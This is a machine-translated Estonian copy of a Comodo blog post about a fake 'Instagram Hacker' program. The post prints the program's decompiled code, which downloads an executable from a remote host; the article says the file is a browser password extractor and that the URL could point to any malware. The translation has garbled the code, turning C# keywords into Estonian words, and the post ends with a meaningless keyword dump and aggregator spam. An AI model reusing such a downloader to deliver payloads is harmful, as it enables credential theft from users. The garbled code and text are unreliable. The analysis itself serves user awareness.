Lugemisaeg: 4 protokoll
Paljud inimesed ei pea potentsiaalselt soovimatuid rakendusi (PUA) tõsiseks ohuks. Sellise hoolimatu suhtumise põhjuseks on see, et PUA paigaldamine toimub tavaliselt kasutaja nõusolekul. Kuid see arvamus on suur viga. Ja mitte ainult sellepärast, et PUA saab varjatult installida muid programme, nagu reklaamvara või nuhkvara, allalaadimise alusel. Ilmekas näide allpool analüüsitud Comodo Threat Research Labsi poolt eksperdid näitavad selgelt, et PUA võib olla palju ähvardavam relv.
Tutvuge tarkvaraga nimega "Instagram Hacker". Sellel on ametlik veebisait https://hackinstagram.net/ ja lubab ... häkkida kõik Instagrami kontod. Veelgi enam, saate selle tasuta alla laadida ja installida.
Pärast installimist palub see sisestada Instagrami profiili URL ja häkkida parool.
Tulemus tuleb mõne sekundi pärast:
Kuid pärast nupu "Vaata parooli" klõpsamist ilmub uus aken:
Nupul „Hangi aktiveerimiskood” klõpsamine suunab lehele „Osta”.
Pakutakse osta "Aktiveerimiskoodi", kuid … kas tunnete õhus pettuse lõhna? On ilmne, et tarkvara, mis suudab Instagrami parooli sekunditeks murda, ei saa eksisteerida. Kas Instagrami häkker on lihtsalt üks pettevahend lihtlabaste petmiseks? Parim viis selle kontrollimiseks on vaadata rakenduse koodi sisse.
Kood on kaitstud Dotnet Reactoriga, kuid seda saab dekodeerida tööriistaga de4dot.
Ja nüüd näeme kindlalt, et rakendus on pettuse tööriist. Koodi esimene fragment lihtsalt võltsib edenemise demonstratsiooniindikaatorit.
Aga teine on huvitavam. Nagu näete, sisaldab see URL-i käivitatava failiga, mille saab alla laadida, kui aktiveerimine õnnestus.
Laadimisaken()
{
Class2.qDiUy7EzyuIMj();
this.filename = "view.exe";
this.uri = uus Uri (“http://software-logistics.net/external/component/download/view.exe”);
this.InitializeComponent();
if (Fail.Olemas(see.failinimi))
{
Fail.Kustuta(see.failinimi);
}
püüdma
{
Veebiklient klient1 = new WebClient();
klient1.DownloadFileAsync(this.uri, this.filename);
client1.DownloadProgressChanged += new DownloadProgressChangedEventHandler(this.method_1);
client1.DownloadFileCompleted += new AsyncCompletedEventHandler(this.method_2);
}
saak
{
this.method_0();
}
}
}
}
Kui käivitame käivitatava faili, saame teada, et see on NirSofti rakendus WebBrowserPassView:
https://www.nirsoft.net/utils/web_browser_password.html
WebBrowserPassView on lihtsalt parooli ekstraheerimise tööriist, mis paljastab veebibrauserite salvestatud paroolid. Nii et kõik paroolid, mida see tarkvara saab eraldada, ei ole Instagrami, vaid kasutajate enda paroolid, mida säilitatakse nende brauseris!
Jätkame: kõik, mida Instagrami häkker teeb, on NirSoftist teise PUA allalaadimine ja käivitamine. Seega seisame ilmselgelt silmitsi pettusvahendiga. Märka siin manipuleerivat psühholoogilist nippi: kui ohver avastab, et teda on petetud, ei teata ta peaaegu juhtunust politseile. Sest sel juhul peaks ta tunnistama, et üritas Instagrami häkkida, see on küberkuritegu.
Kuid see on serva õhuke ots.
Kõige ohtlikum oht on see, et rakenduse URL-i saab hõlpsasti muuta mis tahes muus pahatahtliku failiga, mis käivitatakse ohvri masinas. Nii et seda PUA-d – nagu ka paljusid teisi selle pahavara tüüpi näiteid – saab kasutada mitmesuguse „raske” pahavara, nagu troojalased, tagauksed, massiliseks levitamiseks. ransomware ja nii edasi
Ja see on hea põhjus pidada PUA-d tõeliselt ohtlikuks pahavaraks. Sest see võib osutuda hüppelauaks laastavale massilisele küberrünnakule.
"Täna me ei peaks kaaluma malware kui ohtlik või mitte nii ohtlik, ”ütleb Comodo ohuuuringute labori juht Fatih Orhan. "Ükskõik milline malware ei eksisteeri isoleeritud ruumis. Tänapäeval ehitavad küberkurjategijad kasutajate ründamiseks pikki pahavara kette ja nagu näete, võib PUA olla sellise tapmisahela lüli. Seega peaksime nimetama asju õigete nimedega. Jah, need rakendused laaditakse alla ja käitatakse kasutajate heakskiidul, kuid nagu antud juhul, pressitakse heakskiit välja pettusega. Kui potentsiaalselt soovimatud rakendused teesklevad end legitiimsusena, peavad kõik mõistma, et see on vaid kamuflaaž. Seetõttu ei paku Comodo mitte ainult tipptasemel tehnilist kaitset, vaid teavitab kasutajaid regulaarselt, et vältida küberruumi ohtlike lõksude eest.
Elage Comodoga turvaliselt!
Seotud ressursid
Wikipedia DDOS-rünnak
Malware Removal
Veebisaidi pahavara skanner
Parim veebisaidi turvalisus
WordPress Turvalisus
ALUSTA TASUTA KATSET HANKIGE TASUTA OMA INSTANT TURVAKARTI
- SEO-põhise sisu ja PR-levi. Võimenduge juba täna.
- Platoblockchain. Web3 metaversiooni intelligentsus. Täiustatud teadmised. Juurdepääs siia.
- Allikas: https://blog.comodo.com/comodo-news/how-unwanted-applications-are-greater-security-threat/
- a
- Võimalik
- MEIST
- konto
- tegu
- Aktiveerimine
- pärast
- AIR
- Materjal: BPA ja flataatide vaba plastik
- ja
- Teine
- taotlus
- rakendused
- heakskiit
- rünnak
- suhtumine
- Tagauksed
- alus
- sest
- BEST
- Suur
- Blogi
- Murdma
- brauserid
- ehitama
- nupp
- ostma
- helistama
- juhul
- kett
- ketid
- kontrollima
- selgelt
- kood
- toimepanemine
- nõusolek
- Arvestama
- sisaldab
- Küberrünnak
- Küberkuritegevus
- küberkurjategijad
- OHT
- Ohtlik
- DDoS
- laastav
- Avastab
- Ära
- kahekordistada
- lae alla
- kergesti
- serv
- sisene
- jms
- sündmus
- näide
- näited
- ekspertide
- väljavõte
- nägu
- vähe
- fail
- leidma
- esimene
- pettus
- tasuta
- Alates
- saama
- hea
- suurem
- näksima
- häkker
- juhataja
- siin
- Kuidas
- Kuidas
- HTML
- HTTPS
- in
- juhtum
- Indikaator
- Instagramis
- paigaldama
- kiire
- huvitav
- isoleeritud
- IT
- Labs
- käivitamine
- LINK
- Pikk
- Vaata
- masin
- malware
- Pahavara rünnak
- palju
- suur
- max laiuse
- viga
- rohkem
- kõige
- Nimega
- vajadustele
- Uus
- Ilmne
- Pakkumised
- ametlik
- Ametlik veebisait
- ONE
- Arvamus
- Muu
- enda
- Parool
- paroolid
- Inimesed
- PHP
- Platon
- Platoni andmete intelligentsus
- PlatoData
- Politsei
- potentsiaalselt
- vältida
- profiil
- Programmid
- Edu
- Lubadused
- kaitstud
- kaitse
- anda
- mõistma
- põhjus
- hoolimatu
- regulaarselt
- Aruanded
- teadustöö
- kaasa
- Jätka
- Ilmutab
- Rid
- jooks
- tulemuskaart
- sekundit
- kindlustama
- turvalisus
- tõsine
- peaks
- So
- tarkvara
- Ruum
- nuhkvara
- ladustatud
- edukas
- selline
- Võtma
- Tehniline
- .
- oma
- oht
- läbi kogu
- aeg
- et
- tööriist
- püüniste
- Pöörake
- mõistma
- soovimatu
- URL
- Kasutaja
- Kasutajad
- tavaliselt
- eri
- Ohver
- vaade
- web
- Veebibrauserid
- veebisait
- will
- oleks
- sa
- Sinu
- sephyrnet